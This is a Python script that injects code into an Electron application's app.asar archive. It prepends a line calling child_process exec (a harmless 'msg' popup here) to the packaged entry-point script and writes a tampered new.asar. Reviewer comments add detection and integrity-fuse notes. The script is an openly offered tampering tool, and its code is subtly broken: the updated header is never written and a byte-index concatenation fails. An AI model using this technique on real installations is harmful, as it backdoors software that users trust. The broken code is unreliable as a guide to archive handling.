import json, struct
# JavaScript statement that the script below prepends to the application's
# entry-point file. It dynamically imports Node's child_process module and
# passes the command string `msg * asdasdasd` to exec(), i.e. a visible
# proof-of-execution popup rather than a functional payload.
# NOTE(review): `msg` is presumably the Windows message utility — confirm.
# Detection angle: child_process.exec() runs its argument through a shell, so
# the observable is the Electron application spawning an unexpected child
# process, which process-creation telemetry can alert on.
inj_line = """const { exec } = await import('child_process');exec(`msg * ${"asdasdasd"}`);\n"""
def adjust_offsets(files_dict, delta_main_js, target_offset):
    """Shift stored offsets that lie beyond ``target_offset``, in place.

    Walks the values of ``files_dict``. An entry with an ``'offset'`` key
    has that value parsed as an integer; when it is strictly greater than
    ``target_offset`` it is replaced by the shifted value, stored back as a
    string. An entry with a ``'files'`` key is treated as a nested mapping
    and processed recursively with the same arguments.

    Args:
        files_dict: Mapping of names to entry dicts (mutated in place).
        delta_main_js: Amount added to each qualifying offset.
        target_offset: Threshold; offsets equal to or below it are untouched.

    Returns:
        None.
    """
    for node in files_dict.values():
        # Offsets are kept as strings in the mapping, so convert for the
        # comparison and convert back when storing.
        if 'offset' in node and int(node['offset']) > target_offset:
            node['offset'] = str(int(node['offset']) + delta_main_js)
        if 'files' in node:
            adjust_offsets(node['files'], delta_main_js, target_offset)
# Reads an Electron ASAR archive (app.asar), looks up the entry-point script
# named by the "main" field of the packaged package.json, prepends inj_line to
# that script's bytes and writes a buffer to new.asar. The parsed header is
# also dumped to header.json.
# Defensive context: an archive altered like this no longer matches the one
# that was shipped, so file-integrity monitoring on the application directory
# flags it, and Electron's ASAR integrity validation (the
# EnableEmbeddedAsarIntegrityValidation fuse, paired with OnlyLoadAppFromAsar)
# is the control meant to make the application refuse an archive whose
# contents no longer match the hash recorded at build time.
with open("app.asar", "rb") as rb:
    # The archive begins with four little-endian uint32 fields; only the last
    # one (byte length of the JSON header string) is used below.
    data_size = struct.unpack('<I', rb.read(4))[0]
    header_size = struct.unpack('<I', rb.read(4))[0]
    header_object_size = struct.unpack('<I', rb.read(4))[0]
    header_string_size = struct.unpack('<I', rb.read(4))[0]
    # The JSON header is a nested {"files": {...}} index of the archive.
    json_header = json.loads(rb.read(header_string_size))
    # Dump the parsed index to disk for manual inspection.
    with open("header.json", "w") as w:
        json.dump(json_header, w, indent=4)
    package_json_header = json_header["files"]["package.json"]
    # json_header['files']['app_bootstrap']['files']['index.js']
    # rb.seek(0)
    # Header offsets are turned into file positions by adding
    # header_string_size + 18.
    # NOTE(review): the constant 18 is not explained on this page; presumably
    # it covers the fixed prefix plus padding for the archive the author
    # worked with — confirm before relying on it.
    rb.seek(int(package_json_header["offset"]) + header_string_size + 18 )
    package_json = rb.read(package_json_header["size"])
    package_json = json.loads(package_json)
    # Turn the "main" path (e.g. "a/b.js") into the key sequence
    # files -> a -> files -> b.js used by the nested header.
    mainjs_path = package_json['main'].split("/")
    full_mainjs_path = []
    for item in mainjs_path:
        full_mainjs_path.append("files")
        full_mainjs_path.append(item)
    # Walk the header down to the entry-point file's record.
    target_item = json_header
    for key in full_mainjs_path:
        target_item = target_item[key]
    # Read the current bytes of the entry-point script.
    rb.seek(int(target_item["offset"]) + header_string_size + 18 )
    main_js_raw = rb.read(target_item["size"])
    # print(main_js)
    # Keep the whole original archive in memory as the base for the output.
    rb.seek(0)
    old_asar = rb.read()
    main_js_offset = int(int(target_item["offset"]) + header_string_size + 18)
    json_header_files = json_header['files']
    # Shift offsets in the in-memory header dict; the threshold passed here is
    # the computed file position of the entry point.
    adjust_offsets(json_header_files, len(inj_line), main_js_offset)
    # Author's scratch notes (presumably size and offset values before and
    # after the change for package.json and main.js):
    # package old
    # 3177
    # 187684716
    # package new
    # 3177
    # 187684793
    # mainjs old
    # 47376
    # 69035644
    # mainjs new
    # 47453
    # 69035644
    # Everything that precedes the entry point is copied unchanged.
    new_asar = old_asar[0:main_js_offset]
    main_js = inj_line.encode("utf-8") + main_js_raw
    main_js_len = int(len(main_js))
    # The new size is recorded on the top-level 'main.js' key of the in-memory
    # header dict (not on target_item).
    json_header_files['main.js']["size"] = main_js_len
    # Concatenates the prefix, the modified script and
    # old_asar[main_js_offset + main_js_len], which is a single index into the
    # original buffer.
    new_asar = new_asar + main_js + old_asar[main_js_offset + main_js_len]
    with open("new.asar", "wb") as wb:
        wb.write(new_asar)
    # with open("main.js", "wb") as wb:
    # wb.write(main_js)